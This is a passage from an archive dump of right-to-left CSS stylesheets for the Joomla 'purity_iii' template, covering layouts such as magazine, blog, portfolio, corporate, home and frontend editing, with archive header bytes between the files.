  background: #f7f7f7;
  color: #222222;
  font-weight: 600;
  font-size: 35px;
  margin: 0 0 20px;
  padding: 15px;
  text-transform: uppercase;
}
.glossary-group-items ul {
  padding: 0;
  margin: 0;
}
.glossary-group-items ul > li {
  list-style: none;
  padding: 0;
}
.glossary-group-items ul > li > a {
  color: #444444;
  display: block;
  font-size: 18px;
  padding: 5px 15px;
}
.glossary-group-items ul > li > a:hover,
.glossary-group-items ul > li > a:active,
.glossary-group-items ul > li > a:focus {
  color: #0077bb;
  text-decoration: none;
}PKӜ�\*�T���#purity_iii/css/rtl/layouts/docs.cssnu&1i�.docs-section {
  margin-bottom: 40px;
}
.docs-section .page-header {
  margin-bottom: 20px;
}
.docs-section .page-header h1 {
  font-size: 42px;
}
.example-type h1,
.example-type h2,
.example-type h3,
.example-type h4,
.example-type h5,
.example-type h6 {
  margin: 20px 0;
}
.example-colors .swatch-item {
  width: 100%;
  min-height: 100px;
  position: relative;
  background: #444444;
  color: #fff;
  margin-bottom: 20px;
}
.example-colors .swatch-item dl {
  width: 100%;
  position: absolute;
  bottom: 0;
  padding: 20px;
  margin: 0;
}
.example-colors .color-brand-primary {
  background: #0077bb;
}
.example-colors .color-brand-secondary {
  background: #3e9b52;
}
.example-colors .color-brand-success {
  background: #3e9b52;
}
.example-colors .color-brand-danger {
  background: #cc0000;
}
.example-colors .color-brand-warning {
  background: #ff8800;
}
.example-colors .color-brand-info {
  background: #0099cc;
}
.example-colors .color-gray-darker {
  background: #222222;
}
.example-colors .color-gray-dark {
  background: #444444;
}
.example-colors .color-gray {
  background: #666666;
}
.example-colors .color-gray-light {
  background: #999999;
  color: #444444;
}
.example-colors .color-gray-lighter {
  background: #eeeeee;
  color: #444444;
}
.example-colors .color-gray-lightest {
  background: #f7f7f7;
  color: #444444;
}
.example-buttons .btn,
.example-inputs .btn,
.example-buttons .form-control,
.example-inputs .form-control {
  width: 100%;
  margin-bottom: 20px;
}PKӜ�\�6�
��'purity_iii/css/rtl/layouts/magazine.cssnu&1i�.magazine-item:before,
.magazine-featured-leading:before,
.magazine-featured-intro:before,
.magazine-category:before,
.magazine-item:after,
.magazine-featured-leading:after,
.magazine-featured-intro:after,
.magazine-category:after {
  display: table;
  content: " ";
}
.magazine-item:after,
.magazine-featured-leading:after,
.magazine-featured-intro:after,
.magazine-category:after {
  clear: both;
}
.magazine .page-subheader h2 {
  font-size: 42px;
}
.magazine-category-title {
  margin-bottom: 20px;
  font-size: 18px;
  background: #eeeeee;
  padding: 10px;
}
.magazine-category-title strong {
  font-weight: 600;
}
.magazine-category-title .fa {
  font-size: 14px;
  position: relative;
  top: -1px;
  right: 2px;
}
.magazine-category-title > a {
  display: inline-block;
  color: #444444;
  text-transform: uppercase;
}
.magazine-category-title > a:hover,
.magazine-category-title > a:active,
.magazine-category-title > a:focus {
  text-decoration: none;
  color: #0077bb;
}
.magazine-item .page-header {
  padding-bottom: 0;
  margin-bottom: 5px;
  border-bottom: 0;
}
.magazine-item .page-header h2 {
  margin: 0;
  font-size: 16px;
  line-height: 1.275;
  font-weight: 700;
}
.magazine-item .page-header h2 a:hover,
.magazine-item .page-header h2 a:active,
.magazine-item .page-header h2 a:focus {
  text-decoration: none;
}
.magazine-item .item-image {
  overflow: hidden;
}
.magazine-item .item-image,
.magazine-item .pull-left.item-image,
.magazine-item .pull-right.item-image {
  width: 100%;
  max-width: 100%;
  float: none !important;
  margin-bottom: 20px;
}
.magazine-item .item-image img,
.magazine-item .pull-left.item-image img,
.magazine-item .pull-right.item-image img,
.magazine-item .img_caption {
  width: 100% !important;
  max-width: 100%;
}
.magazine-item .article-aside {
  margin-top: 10px;
  margin-bottom: 10px;
}
.magazine-item .article-info {
  color: #999999;
  margin: 0;
  width: 100%;
}
.magazine-item .article-info dd {
  white-space: inherit;
}
.magazine-item-ct p:last-child {
  margin-bottom: 0;
}
.magazine-leading {
  margin-bottom: 20px;
}
.magazine-leading .magazine-item {
  margin-bottom: 20px;
}
.magazine-leading .magazine-item .page-header h2 {
  font-size: 35px;
}
@media screen and (min-width: 768px) {
  .magazine-leading .magazine-item .item-image {
    max-height: 300px;
  }
}
.magazine-leading .magazine-item .magazine-item-ct {
  font-size: 16px;
}
.magazine-intro {
  margin-bottom: 20px;
}
.magazine-intro .magazine-item {
  margin-bottom: 20px;
}
.magazine-intro .magazine-item .item-image {
  max-height: 120px;
}
.magazine-intro .magazine-item .item-image p.img_caption {
  display: none;
}
.magazine-links {
  margin-top: 40px;
}
.magazine-links::before {
  display: inline-block;
  content: "MORE NEWS";
  background: #444444;
  font-weight: normal;
  padding: 5px 10px;
  margin-bottom: 10px;
  color: #fff;
}
.magazine-links .link-item {
  border-bottom: 1px solid #eeeeee;
  padding: 10px 0 9px;
}
.magazine-links .page-header {
  margin: 0;
}
.magazine-links .page-header h2 {
  font-size: 16px;
}
.magazine-links .article-aside {
  margin-top: 5px;
  margin-bottom: 0;
}
.magazine-featured-links {
  margin-top: 0;
  margin-bottom: 40px;
}
.magazine-category {
  margin-bottom: 40px;
}
.magazine-category .row-articles {
  margin-bottom: 20px;
}
.magazine-category .row-articles:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 992px) {
  .magazine-category .row-articles .magazine-item-media {
    padding-left: 0;
  }
}
.magazine-category .magazine-leading {
  margin-bottom: 40px;
}
.magazine-category .magazine-item .category-name {
  display: none;
}
.magazine-category .magazine-item-ct {
  color: #666666;
  font-size: 12px;
}PKӜ�\-purity_iii/css/rtl/layouts/features-intro.cssnu&1i�PKӜ�\��ﱛ�#purity_iii/css/rtl/layouts/blog.cssnu&1i�.blog .blog-item {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 40px;
  padding-bottom: 40px;
}
.blog .blog-item .item-image {
  margin-top: 7px;
  margin-left: 0;
}
.blog .blog-item .item-image.pull-left {
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  .blog .blog-item .item-image.pull-left {
    float: none !important;
  }
}
.blog .blog-item .item-image img {
  max-width: 100%;
  width: 100%;
}
.blog .blog-item .page-header {
  border: 0;
  margin: 0 0 10px;
  padding: 0;
}
.blog .blog-item .page-header h2 {
  margin: 0;
  line-height: 1.3;
}
.blog .blog-item .page-header h2 a:hover,
.blog .blog-item .page-header h2 a:focus,
.blog .blog-item .page-header h2 a:active {
  color: #00466e;
}
.blog .blog-item .article-intro {
  margin-bottom: 20px;
}
.blog .item-page .tags {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
}
.blog .item-page .tags span a {
  background: #eeeeee;
}PKӜ�\�ر6'purity_iii/css/rtl/layouts/porfolio.cssnu&1i�.porfolio .page-header {
  text-align: center;
  border-bottom: 0;
  margin-top: 10px;
  margin-bottom: 0;
  padding: 0;
}
.porfolio-items {
  margin-top: 20px;
  padding-top: 20px;
  border-top: 1px solid #eeeeee;
  text-align: center;
}
.porfolio-items .thumbnail {
  border: 0;
  padding: 0;
  margin: 20px 0;
}
.porfolio-items .thumbnail > a {
  color: #444444;
  text-decoration: none;
}
.porfolio-items .thumbnail > a:hover,
.porfolio-items .thumbnail > a:active,
.porfolio-items .thumbnail > a:focus {
  color: #0077bb;
  text-decoration: none;
}
.porfolio-items .item-image {
  float: none !important;
  border: 1px solid #eeeeee;
  padding: 3px;
  position: relative;
  -webkit-transition: border-color 0.2s ease-in;
  -o-transition: border-color 0.2s ease-in;
  transition: border-color 0.2s ease-in;
}
.porfolio-items .item-image img {
  width: 100%;
  padding: 0;
}
.porfolio-items .thumbnail > a:hover .item-image,
.porfolio-items .thumbnail > a:active .item-image,
.porfolio-items .thumbnail > a:focus .item-image {
  border-color: #bbbbbb;
}
.porfolio-items .thumbnail > a:hover .item-image img,
.porfolio-items .thumbnail > a:active .item-image img,
.porfolio-items .thumbnail > a:focus .item-image img {
  opacity: .7;
}
.porfolio-items h3 {
  margin-top: 20px;
  margin-bottom: 5px;
  font-weight: 700;
  font-size: 18px;
}
.porfolio-items p {
  color: #666666;
  margin: 0;
}
.porfolio .item-state {
  width: 70px;
  height: 70px;
  background: url(../../../images/porfolio-item-states.png) no-repeat center top;
  display: block;
  text-indent: -9999em;
  position: absolute;
  top: -3px;
  left: -3px;
}
.porfolio .state-free {
  background-position: center;
}
.porfolio .state-hot {
  background-position: center bottom;
}
.porfolio .item-demo-url {
  display: inline-block;
  margin-top: 20px;
}PKӜ�\�.��(purity_iii/css/rtl/layouts/corporate.cssnu&1i�.corporate .slideshow {
  background: #f7f7f7;
  border-bottom: 1px solid #eeeeee;
  padding: 40px 0;
}
.corporate .t3-sl-1 {
  border-bottom: 1px solid #eeeeee;
}
.corporate .t3-sl-1 .t3-module,
.corporate .t3-sl-2 .t3-module,
.corporate .t3-sl-3 .t3-module {
  margin-bottom: 0;
}
.corporate .t3-sl-2 {
  padding: 0;
}
.corporate .carousel-caption {
  background: rgba(0, 0, 0, 0.3);
}
.corporate .t3-module .media {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 10px;
}
.corporate .t3-module .media:last-child {
  border: 0;
  padding: 0;
}
.corporate .items-leading {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 40px;
}
.corporate .items-row {
  border-bottom: 1px solid #eeeeee;
}
.corporate .items-row:last-child {
  border: 0;
}PKӜ�\1�o�llpurity_iii/css/rtl/windows.cssnu&1i�

.window body {
  height: auto;
  padding: 0;
  margin: 0;
}
.window .window-mainbody {
  padding: 20px;
}
PKӜ�\��C[[purity_iii/css/rtl/red/home.cssnu&1i�

.home h1 {
  line-height: 1;
}
.home h2 {
  font-size: 21px;
}
@media screen and (min-width: 768px) {
  .home h2 {
    font-size: 30px;
  }
}
.home .jumbotron {
  background-color: transparent;
  position: relative;
  margin-bottom: 0;
}
.home .t3-sl-1 {
  padding: 0;
  background: #cc0000;
  color: #ffffff;
  border-bottom: 1px solid #eeeeee;
}
.home .t3-sl-1 .jumbotron {
  border-radius: 0;
}
.home .t3-sl-1 .jumbotron .btn {
  margin-top: 20px;
}
.home .t3-sl-2 {
  text-align: center;
}
.home .t3-sl-2 .img-responsive {
  display: inline-block;
}
@media screen and (min-width: 768px) {
  .home .t3-sl-2 p {
    font-size: 16px;
    line-height: 22px;
  }
}
.home .t3-sl-3 p > img {
  margin-top: 20px;
}
@media screen and (min-width: 992px) {
  .home .t3-sl-3 p > img {
    margin-top: 0;
  }
}
.home .t3-sl-3,
.home .t3-sl-4 {
  border-top: 1px solid #eeeeee;
  text-align: center;
}
@media screen and (min-width: 768px) {
  .home .t3-sl-3 p,
  .home .t3-sl-4 p {
    font-size: 16px;
    line-height: 22px;
  }
}
.home .t3-sl-3 .jumbotron,
.home .t3-sl-4 .jumbotron {
  padding-top: 0;
}
.home .t3-sl-3 .jumbotron h1,
.home .t3-sl-4 .jumbotron h1 {
  margin-bottom: 10px;
  margin-top: 0;
}
.home .t3-sl-3 .jumbotron p,
.home .t3-sl-4 .jumbotron p {
  font-size: 18px;
  line-height: 1.25;
  color: #999999;
}
@media screen and (min-width: 768px) {
  .home .t3-sl-3 .jumbotron p,
  .home .t3-sl-4 .jumbotron p {
    font-size: 21px;
  }
}
.home .t3-sl-5 {
  background: #cc0000;
  color: #ffffff;
  border-top: 1px solid #eeeeee;
  padding: 0;
}
.home .t3-sl-5 .jumbotron {
  border-radius: 0;
  margin-bottom: 0;
}
PKӜ�\���.�H�H(purity_iii/css/rtl/red/frontend-edit.cssnu&1i�.com_config .btn,
.com_content.layout-edit .edit.item-page .btn,
.layout-modal .contentpane .btn {
  border-radius: 5px;
  padding: 8px 16px;
}
.com_config input[type="text"],
.com_content.layout-edit .edit.item-page input[type="text"],
.layout-modal .contentpane input[type="text"],
.com_config input[type="email"],
.com_content.layout-edit .edit.item-page input[type="email"],
.layout-modal .contentpane input[type="email"],
.com_config input[type="number"],
.com_content.layout-edit .edit.item-page input[type="number"],
.layout-modal .contentpane input[type="number"],
.com_config input[type="password"],
.com_content.layout-edit .edit.item-page input[type="password"],
.layout-modal .contentpane input[type="password"] {
  box-shadow: none;
  border-radius: 5px;
  padding: 0 12px;
  height: 40px;
  line-height: 40px;
}
.com_config input[type="text"]:focus,
.com_content.layout-edit .edit.item-page input[type="text"]:focus,
.layout-modal .contentpane input[type="text"]:focus,
.com_config input[type="email"]:focus,
.com_content.layout-edit .edit.item-page input[type="email"]:focus,
.layout-modal .contentpane input[type="email"]:focus,
.com_config input[type="number"]:focus,
.com_content.layout-edit .edit.item-page input[type="number"]:focus,
.layout-modal .contentpane input[type="number"]:focus,
.com_config input[type="password"]:focus,
.com_content.layout-edit .edit.item-page input[type="password"]:focus,
.layout-modal .contentpane input[type="password"]:focus {
  border-color: #ccc;
}
.com_config textarea,
.com_content.layout-edit .edit.item-page textarea,
.layout-modal .contentpane textarea {
  border: 1px solid #ddd;
  border-radius: 5px;
  box-shadow: none;
}
.com_config textarea:focus,
.com_content.layout-edit .edit.item-page textarea:focus,
.layout-modal .contentpane textarea:focus {
  box-shadow: none;
  border: 1px solid #ccc;
}
.com_config select,
.com_content.layout-edit .edit.item-page select,
.layout-modal .contentpane select {
  border-radius: 5px;
  height: auto;
  padding: 8px;
}
.com_config .input-group .btn,
.com_content.layout-edit .edit.item-page .input-group .btn,
.layout-modal .contentpane .input-group .btn {
  padding-top: 0;
  padding-bottom: 0;
}
.com_config #templates-form .tip {
  background: #f5f5f5;
  padding: 12px 12px;
}
.com_config #templates-form textarea {
  height: auto;
  width: auto;
  min-height: 100px;
  min-width: 50%;
}
.com_config #templates-form .input-append .add-on,
.com_config #templates-form .input-prepend .add-on {
  width: 35px;
}
.com_config #templates-form .input-append input,
.com_config #templates-form .input-prepend input {
  display: inline-block;
}
.com_config #templates-form .input-append .btn,
.com_config #templates-form .input-prepend .btn {
  border: 1px solid #cccccc;
}
.com_config #templates-form .t3-admin-form-legend {
  display: none;
}
.com_config #templates-form .row-fluid .span6 {
  width: 100%;
}
@media (min-width: 768px) {
  .com_config #templates-form .control-group .control-label {
    width: 250px;
  }
  .com_config #templates-form .control-group .controls {
    margin-right: 280px;
  }
}
.com_config.view-modules #options .accordion-item {
  background-color: #ffffff;
  border: 1px solid #ddd;
  border-radius: 5px;
  margin-bottom: 8px;
}
.com_config.view-modules #options .accordion-header {
  font-size: 18px;
  margin: 0;
  padding: 16px;
  line-height: 1;
}
.com_config.view-modules #options .accordion-header .accordion-button {
  background: transparent;
  border: 0;
  padding: 0;
  text-align: right;
  width: 100%;
}
.com_config.view-modules #options .accordion-body {
  border-top: 1px solid #ddd;
  padding: 24px;
}
.com_config.view-modules #options .accordion-body .nav-tabs {
  background: transparent;
}
.com_config #modules-form .input-append .add-on,
.com_config #modules-form .input-prepend .add-on {
  width: 35px;
}
.com_config #modules-form .input-append input,
.com_config #modules-form .input-prepend input {
  display: inline-block;
}
.com_config #modules-form .input-append .btn,
.com_config #modules-form .input-prepend .btn {
  border: 1px solid #cccccc;
}
.com_config #modules-form .accordion-group {
  margin-bottom: 20px;
}
.com_config #modules-form .accordion-group .accordion-heading .accordion-toggle {
  border: 1px solid #ddd;
  border-radius: 5px 5px 0 0;
  color: #428bca;
  display: block;
  padding: 10px;
  outline: none;
}
.com_config #modules-form .accordion-group .accordion-heading .accordion-toggle.collapsed {
  border-radius: 5px;
  color: #666;
}
.com_config #modules-form .accordion-group .accordion-body {
  border: 1px solid #ddd;
  border-top: 0;
  border-radius: 0 0 5px 5px;
  padding-top: 20px;
}
.com_config #modules-form .accordion-group .accordion-body .nav-tabs {
  border-bottom: 0;
}
.com_config #modules-form .radio input[type="radio"] {
  margin-right: 0;
  position: relative;
}
.com_config #modules-form .radio label {
  padding-right: 5px;
  padding-left: 20px;
}
.controls select {
  vertical-align: middle;
  width: 220px;
}
@media (min-width: 768px) {
  .edit .inputbox,
  .edit input[type="text"],
  .edit select.inputbox,
  .edit select {
    width: 250px;
  }
}
.edit textarea {
  width: 100%;
}
.edit .input-append,
.edit .input-prepend {
  display: block;
  width: auto;
}
@media (min-width: 768px) {
  .edit .input-append input[type="text"],
  .edit .input-prepend input[type="text"],
  .edit .input-append input.inputbox,
  .edit .input-prepend input.inputbox {
    display: inline-block;
    width: 210px;
  }
}
.edit .input-append .btn,
.edit .input-prepend .btn {
  border: 1px solid #cccccc;
  background-color: #ffffff;
}
.edit.item-page #jform_com_fields_checkboxs label.checkbox,
.profile-edit #jform_com_fields_checkboxs label.checkbox {
  display: inline-block;
  margin-left: 10px;
}
.edit.item-page #jform_com_fields_checkboxs input[type="checkbox"],
.profile-edit #jform_com_fields_checkboxs input[type="checkbox"] {
  margin-right: 0;
  margin-top: -2px;
  position: relative;
  vertical-align: middle;
  width: auto;
}
.edit.item-page .minicolors-input,
.profile-edit .minicolors-input {
  height: 28px;
  width: auto;
}
.edit.item-page .chzn-container .chzn-search:before,
.profile-edit .chzn-container .chzn-search:before,
.edit.item-page .chzn-container .chzn-search:after,
.profile-edit .chzn-container .chzn-search:after {
  display: table;
  content: " ";
}
.edit.item-page .chzn-container .chzn-search:after,
.profile-edit .chzn-container .chzn-search:after {
  clear: both;
}
.profile-edit #jform_com_fields_user_checkbox label.checkbox {
  display: inline-block;
  margin-left: 10px;
}
.profile-edit #jform_com_fields_user_checkbox input {
  position: relative;
  margin-right: 0;
  margin-left: 5px;
  width: auto;
}
.profile-edit .minicolors-input {
  height: 28px;
  width: auto;
}
.profile-edit #jform_com_fields_user_image_chzn .chzn-search {
  box-sizing: border-box;
}
.profile-edit #jform_com_fields_user_image_chzn ul.chzn-results {
  box-sizing: border-box;
  padding: 0;
  margin: 0;
  width: 100%;
}
.profile-edit #jform_com_fields_user_calendar {
  float: right;
}
.profile-edit .chzn-container-single,
.profile-edit .chzn-container {
  float: right;
  margin-left: 10px;
}
@media screen and (max-width: 360px) {
  .profile-edit .chzn-container-single,
  .profile-edit .chzn-container {
    width: 100% !important;
  }
}
.profile-edit .chzn-container-single .chzn-drop,
.profile-edit .chzn-container .chzn-drop {
  box-sizing: border-box !important;
}
.j40 .profile-edit .t3onoff,
.j50 .profile-edit .t3onoff {
  min-height: auto;
  border: 0;
  height: auto;
  width: auto;
}
.j40 .profile-edit .t3onoff .radio,
.j50 .profile-edit .t3onoff .radio {
  display: flex;
  align-items: center;
  min-height: auto;
  padding: 0;
}
.j40 .profile-edit .t3onoff .radio .form-check,
.j50 .profile-edit .t3onoff .radio .form-check {
  display: flex;
  align-items: center;
}
.j40 .profile-edit .t3onoff .radio .form-check input[type="radio"],
.j50 .profile-edit .t3onoff .radio .form-check input[type="radio"] {
  display: inline-block;
}
.j40 .profile-edit .t3onoff label,
.j50 .profile-edit .t3onoff label {
  padding: 0;
  margin: 0;
  position: relative;
  top: auto;
  right: auto;
  height: auto;
  text-indent: 0;
  text-transform: none;
  width: auto;
}
.j40 .profile-edit .t3onoff label.active,
.j50 .profile-edit .t3onoff label.active {
  background: transparent;
}
.j40 .profile-edit .t3onoff label::before,
.j50 .profile-edit .t3onoff label::before,
.j40 .profile-edit .t3onoff label::after,
.j50 .profile-edit .t3onoff label::after {
  display: none;
}
.profile #users-profile-core {
  width: 100%;
}
.profile .dl-horizontal dd {
  margin-bottom: 10px;
  border-bottom: 1px dashed #ddd;
  padding-bottom: 10px;
}
.profile .dl-horizontal dd img {
  max-width: 100%;
}
.edit .nav-tabs {
  margin-bottom: 20px;
}
.edit .tab-pane:before,
.edit .tab-pane:after {
  display: table;
  content: " ";
}
.edit .tab-pane:after {
  clear: both;
}
#editor-xtd-buttons,
.toggle-editor {
  margin-top: 20px;
  margin-bottom: 20px;
}
#editor-xtd-buttons .btn,
.toggle-editor .btn {
  background-color: #ffffff;
  text-shadow: 0 1px 0 #fff;
  border-color: #cccccc;
}
#editor-xtd-buttons {
  margin-left: 40px;
}
#sbox-window {
  padding: 0;
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
}
.btn.jmodedit {
  padding: 0;
}
.btn.jmodedit:focus,
.btn.jmodedit:active {
  box-shadow: none;
}
.jfedit-menu + .tooltip {
  min-width: 100px;
}
.window form table {
  border: 1px solid #dddddd;
  background: #f9f9f9;
  margin-bottom: 20px;
}
.window form table td {
  padding: 8px;
}
.window form .help-block {
  font-size: 12px;
  clear: both;
  padding-top: 5px;
}
.window.view-modules .well .control-label {
  display: inline-block;
}
.window.view-modules .well .controls {
  display: inline-block;
  vertical-align: middle;
  margin-right: 10px;
}
.window.view-modules .control-group:after {
  content: "";
  clear: both;
  display: table;
}
.window.view-modules #filter-bar {
  margin-bottom: 10px;
}
.window.view-modules #filter-bar .btn-group button {
  margin-top: 0;
}
.com_config.view-modules .btn-group label {
  float: right;
  padding-right: 10px !important;
  padding-left: 10px !important;
}
.window #imageForm {
  margin: 0;
  width: auto;
}
.window #imageForm .chzn-container {
  float: right;
}
.window #imageForm #upbutton {
  border: 1px solid #cccccc;
  float: right;
  padding: 3px 12px;
  margin-right: 5px;
}
.window #imageForm .pull-right {
  margin-left: 40px;
}
.window #imageForm .well:after {
  display: table;
  content: "";
  clear: both;
}
.window #uploadForm {
  width: auto;
}
.window #uploadForm #upload-file {
  margin: 10px 0;
}
.window .manager {
  margin: 0;
  padding: 0;
}
.window .manager:before,
.window .manager:after {
  display: table;
  content: " ";
}
.window .manager:after {
  clear: both;
}
.window .manager .thumbnail {
  float: right;
  margin-left: 10px;
  margin-right: 10px;
}
.window.view-articles .filter {
  overflow: visible;
}
.window.view-articles .filter .btn-toolbar .icon-remove,
.window.view-articles .filter .btn-toolbar .icon-search {
  margin-left: 5px;
}
.window.view-articles .filters {
  float: none !important;
}
.window.view-articles .filters .chzn-container {
  display: inline-block;
}
.window.view-articles .filters .chzn-drop input {
  float: none;
}
.t3onoff {
  border: 1px solid #aaa;
  border-radius: 0;
  display: block;
  height: 30px;
  overflow: hidden;
  padding: 0;
  position: relative;
  white-space: nowrap;
  width: 90px;
  
  
  
  
  
}
.t3onoff input[type=radio] {
  display: none;
}
.t3onoff label {
  width: 90px;
  height: 30px;
  overflow: hidden;
  display: block;
  border-radius: 0;
  position: absolute;
  top: -1px;
  right: -1px;
  z-index: 1;
  text-transform: uppercase;
  background: url(../../../../../plugins/system/t3/base-bs3/imgs/blank.gif) no-repeat transparent;
  text-indent: -999em;
}
.t3onoff label:before,
.t3onoff label:after {
  display: block;
  position: absolute;
  top: 0;
  border-radius: 0;
  -webkit-transition: all 250ms;
  -o-transition: all 250ms;
  transition: all 250ms;
}
.t3onoff label:before {
  content: "ON";
  width: 100%;
  height: 100%;
  text-indent: 0;
  color: white;
  padding: 4px 18px;
  font-weight: normal;
}
.t3onoff label:after {
  content: "";
  width: 40%;
  height: 100%;
  background: #fff;
}
.t3onoff label.off:before {
  content: "OFF";
  text-align: left;
  color: #555;
}
.t3onoff label.active {
  z-index: 0;
}
.t3onoff label.off:before {
  background: #eee;
  right: 100%;
}
.t3onoff label.off.active:before {
  right: 0%;
}
.t3onoff label.on:before {
  background: #690;
  right: -100%;
}
.t3onoff label.on.active:before {
  right: -0%;
}
.t3onoff label.off:after {
  right: 60%;
}
.t3onoff label.off.active:after {
  right: 0%;
}
.t3onoff label.on:after {
  right: 0%;
}
.t3onoff label.on.active:after {
  right: 60%;
}

fieldset.radio.btn-group {
  padding: 0;
}
fieldset.radio.btn-group input {
  display: none;
}
fieldset.radio.btn-group label {
  display: inline-block;
  min-width: 54px;
  padding: 0 12px;
  border: 1px solid #aaa;
  line-height: 28px;
  background: #eee;
  color: #555;
  border-radius: 0;
  text-align: center;
  border-left-width: 0px;
  text-transform: uppercase;
}
fieldset.radio.btn-group label:last-child {
  border-left-width: 1px;
}
fieldset.radio.btn-group label.active {
  background: #690;
  border-color: #5c8b00;
  color: #fff;
}
.window.view-modules .js-stools,
.window.view-articles .js-stools,
.window.view-contacts .js-stools,
.window.view-fields .js-stools,
.window.view-items .js-stools {
  margin-bottom: 20px;
}
.window.view-modules .js-stools .btn,
.window.view-articles .js-stools .btn,
.window.view-contacts .js-stools .btn,
.window.view-fields .js-stools .btn,
.window.view-items .js-stools .btn {
  border: 1px solid #ccc;
  margin-top: 0;
}
.window.view-modules .js-stools .input-append .btn,
.window.view-articles .js-stools .input-append .btn,
.window.view-contacts .js-stools .input-append .btn,
.window.view-fields .js-stools .input-append .btn,
.window.view-items .js-stools .input-append .btn {
  border-right: 0;
}
.window.view-modules .js-stools input,
.window.view-articles .js-stools input,
.window.view-contacts .js-stools input,
.window.view-fields .js-stools input,
.window.view-items .js-stools input {
  display: inline-block;
}
.window.view-modules .js-stools-container-filters .chzn-container-single,
.window.view-articles .js-stools-container-filters .chzn-container-single,
.window.view-contacts .js-stools-container-filters .chzn-container-single,
.window.view-fields .js-stools-container-filters .chzn-container-single,
.window.view-items .js-stools-container-filters .chzn-container-single {
  width: 220px !important;
}
.window.view-modules .js-stools-container-filters .chzn-drop,
.window.view-articles .js-stools-container-filters .chzn-drop,
.window.view-contacts .js-stools-container-filters .chzn-drop,
.window.view-fields .js-stools-container-filters .chzn-drop,
.window.view-items .js-stools-container-filters .chzn-drop {
  box-sizing: border-box !important;
}
.window.view-modules table#moduleList td .label,
.window.view-articles table#moduleList td .label,
.window.view-contacts table#moduleList td .label,
.window.view-fields table#moduleList td .label,
.window.view-items table#moduleList td .label {
  background-color: #999;
  box-sizing: border-box;
  border-radius: 3px;
  display: inline-block;
  font-weight: normal;
  font-size: 100%;
  padding: 10px;
  width: 100%;
}
.window.view-modules table#moduleList td:nth-child(1),
.window.view-articles table#moduleList td:nth-child(1),
.window.view-contacts table#moduleList td:nth-child(1),
.window.view-fields table#moduleList td:nth-child(1),
.window.view-items table#moduleList td:nth-child(1) {
  vertical-align: middle;
}
.window.view-modules .icon-publish:before,
.window.view-articles .icon-publish:before,
.window.view-contacts .icon-publish:before,
.window.view-fields .icon-publish:before,
.window.view-items .icon-publish:before {
  content: "\f00c";
  font-size: 16px;
}
.icon-eye-open:before,
.icon-eye:before {
  content: "\f06e";
  font-family: "FontAwesome";
}
.icon-file-add:before {
  content: "\f0f6";
  font-family: "FontAwesome";
}
.icon-cancel:before {
  content: "\f00d";
  font-family: "FontAwesome";
}
.icon-publish:before {
  content: "\f00c";
}
.icon-unpublish:before {
  content: "\f00d";
}
.icon-featured:before {
  content: "\f005";
}
.icon-unfeatured:before {
  content: "\f005";
}
.button2-left,
.button2-left div {
  float: right;
}
.button2-right,
.button2-right div {
  float: left;
}
.button2-left {
  margin: 5px 0 0 5px;
}
.button2-right {
  margin: 5px 5px 0 0;
}
.button2-left a,
.button2-right a,
.button2-left span,
.button2-right span {
  background: #eeeeee;
  border: 1px solid #e1e1e1;
  color: #999999;
  cursor: pointer;
  display: block;
  float: right;
  padding: 2px 10px;
  border-radius: 0;
}
.button2-left span,
.button2-right span {
  color: #999999;
  cursor: default;
}
.button2-left .page a,
.button2-right .page a,
.button2-left .page span,
.button2-right .page span {
  padding: 0 6px;
}
.button2-left a:hover,
.button2-right a:hover {
  background: #e1e1e1;
  color: #444444;
  text-decoration: none;
}
.edit.item-page a.modal,
.com_config form a.modal {
  display: inline-block;
  position: inherit;
  width: auto !important;
  top: auto !important;
  overflow: hidden;
}
.edit.item-page a.modal.btn,
.com_config form a.modal.btn {
  background: #ffffff;
  text-shadow: 0 1px 0 #fff;
  border-color: #cccccc;
  overflow: hidden;
}
.controls img.calendar {
  cursor: pointer;
  margin-right: 5px;
}
.layout-pagebreak .form-horizontal .control-group .controls {
  margin-right: 0;
}
[class^="icon-"],
[class*=" icon-"] {
  font-family: FontAwesome3 !important;
}
.view-history .btn-group {
  margin-bottom: 10px;
}
.btn [class^="icon-"],
.btn [class*=" icon-"] {
  margin-left: 5px;
}
.btn span.icon-delete:before {
  content: "\f057";
  display: inline-block;
  height: 16px;
  width: 16px;
  color: #333;
}
body.modal-open .modal.hide {
  background-color: #fff;
  display: block !important;
  right: auto;
  left: auto;
  top: 0;
  bottom: auto;
  transform: translateY(50%);
  z-index: 1050;
}
body.modal-open .modal.hide .iframe {
  border: 1px solid #ddd;
}
.thumbnails-media .imgFolder span {
  line-height: 70px;
}
.j4 joomla-tab {
  margin-bottom: 20px;
}
.j40 joomla-tab-element {
  margin-bottom: 20px;
}
ul.chosen-results {
  clear: both;
}PKӜ�\���VV,purity_iii/css/rtl/red/legacy-navigation.cssnu&1i�.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  right: 100%;
  margin-top: -5px;
  margin-right: -1px;
}
.dropdown-submenu.open > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 0;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: left;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 5px 5px 0;
  border-right-color: #111111;
  margin-top: 5px;
  margin-left: -5px;
}
.dropdown-submenu.open > a:after {
  border-right-color: #ffffff;
}PKӜ�\1�o�ll"purity_iii/css/rtl/red/windows.cssnu&1i�

.window body {
  height: auto;
  padding: 0;
  margin: 0;
}
.window .window-mainbody {
  padding: 20px;
}
PKӜ�\t�(!��+purity_iii/css/rtl/red/layouts/magazine.cssnu&1i�.magazine-item:before,
.magazine-featured-leading:before,
.magazine-featured-intro:before,
.magazine-category:before,
.magazine-item:after,
.magazine-featured-leading:after,
.magazine-featured-intro:after,
.magazine-category:after {
  display: table;
  content: " ";
}
.magazine-item:after,
.magazine-featured-leading:after,
.magazine-featured-intro:after,
.magazine-category:after {
  clear: both;
}
.magazine .page-subheader h2 {
  font-size: 42px;
}
.magazine-category-title {
  margin-bottom: 20px;
  font-size: 18px;
  background: #eeeeee;
  padding: 10px;
}
.magazine-category-title strong {
  font-weight: 600;
}
.magazine-category-title .fa {
  font-size: 14px;
  position: relative;
